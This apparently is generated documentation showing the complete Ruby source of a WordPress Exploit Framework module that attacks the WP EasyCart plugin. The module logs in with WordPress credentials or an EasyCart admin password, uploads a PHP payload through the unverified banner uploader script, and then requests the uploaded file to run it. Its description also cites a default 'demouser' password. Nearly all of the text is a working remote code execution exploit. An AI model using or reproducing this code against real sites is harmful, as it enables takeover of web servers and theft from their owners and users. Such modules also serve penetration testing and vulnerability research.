class Wpxf::Exploit::EasyCartShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 8
def initialize
  super

  update_info(
    name: 'EasyCart Shell Upload',
    desc: 'WordPress Shopping Cart (WP EasyCart) Plugin for WordPress '\
          'contains a flaw that allows a remote attacker to execute '\
          'arbitrary PHP code. This flaw exists because the '\
          '/inc/amfphp/administration/banneruploaderscript.php script does '\
          'not properly verify or sanitize user-uploaded files. By '\
          'uploading a .php file, the remote system will place the file in '\
          'a user-accessible path. Making a direct request to the uploaded '\
          'file will allow the attacker to execute the script with the '\
          'privileges of the web server.'\
          "\n"\
          'In versions <= 3.0.8 authentication can be done by using the '\
          'WordPress credentials of a user with any role. In later '\
          'versions, a valid EasyCart admin password will be required that '\
          'is in use by any admin user. A default installation of EasyCart '\
          'will setup a user called "demouser" with a preset password '\
          'of "demouser".',
    author: [
      'Kacper Szurek', # Vulnerability disclosure
      'rastating'      # WPXF module
    ],
    references: [
      ['WPVDB', '7745']
    ],
    date: 'Jan 08 2015'
  )

  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with (versions <= 3.0.8)'
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with (versions <= 3.0.8)'
    ),
    StringOption.new(
      name: 'ec_password',
      desc: 'The EasyCart password to authenticate with (versions <= 3.0.18)'
    ),
    BooleanOption.new(
      name: 'ec_password_is_hash',
      desc: 'Whether or not ec_password is an MD5 hash',
      default: false
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 92
def check
  check_plugin_version_from_readme('wp-easycart', '3.0.19')
end
ec_password() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 68
def ec_password
  normalized_option_value('ec_password')
end
ec_password_is_hash() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 72
def ec_password_is_hash
  normalized_option_value('ec_password_is_hash')
end
password() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 64
def password
  normalized_option_value('password')
end
payload_body_builder(date_hash, payload_name, include_req_id) click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 104
def payload_body_builder(date_hash, payload_name, include_req_id)
  builder = Utility::BodyBuilder.new
  builder.add_field('datemd5', date_hash)
  builder.add_file_from_string('Filedata', payload.encoded, payload_name)
  builder.add_field('reqID', req_id) if include_req_id
  builder
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 96
def plugin_url
  normalize_uri(wordpress_url_plugins, 'wp-easycart')
end
req_id() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 84
def req_id
  if ec_password_is_hash
    return ec_password
  else
    return Utility::Text.md5(ec_password)
  end
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 112
def run
  return false unless super

  if !use_wordpress_authentication && !use_ec_authentication
    emit_error 'You must set either the username and password options or '\
               'specify an ec_password value'
    return false
  end

  if use_wordpress_authentication && use_ec_authentication
    emit_info 'Both EasyCart and WordPress credentials were supplied, '\
              'attempting WordPress first...'
  end

  if use_wordpress_authentication
    emit_info "Authenticating using #{username}:#{password}..."
    cookie = wordpress_login(username, password)

    if !cookie
      if use_ec_authentication
        emit_warning 'Failed to authenticate with WordPress, attempting '\
                     'upload with EC password next...'
      else
        emit_error 'Failed to authenticate with WordPress'
        return false
      end
    else
      emit_success 'Authenticated with WordPress', true
    end
  end

  emit_info 'Preparing payload...'
  payload_name = Utility::Text.rand_alpha(10)
  date_hash = Utility::Text.md5(Time.now.to_s)
  uploaded_filename = "#{payload_name}_#{date_hash}.php"
  payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
  builder = payload_body_builder(
    date_hash,
    "#{payload_name}.php",
    use_ec_authentication
  )

  emit_info 'Uploading payload...'
  res = nil
  builder.create do |body|
    res = execute_post_request(url: uploader_url, body: body, cookie: cookie)
  end

  if res.nil? || res.code != 200
    emit_error 'Failed to upload payload'
    emit_error "Server responded with code #{res.code}", true
    return false
  end

  emit_info 'Executing the payload...'
  res = execute_get_request(url: payload_url)
  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  true
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 100
def uploader_url
  normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
end
use_ec_authentication() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 80
def use_ec_authentication
  ec_password.to_s != ''
end
use_wordpress_authentication() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 76
def use_wordpress_authentication
  username.to_s != '' && password.to_s != ''
end
username() click to toggle source
# File lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb, line 60
def username
  normalized_option_value('username')
end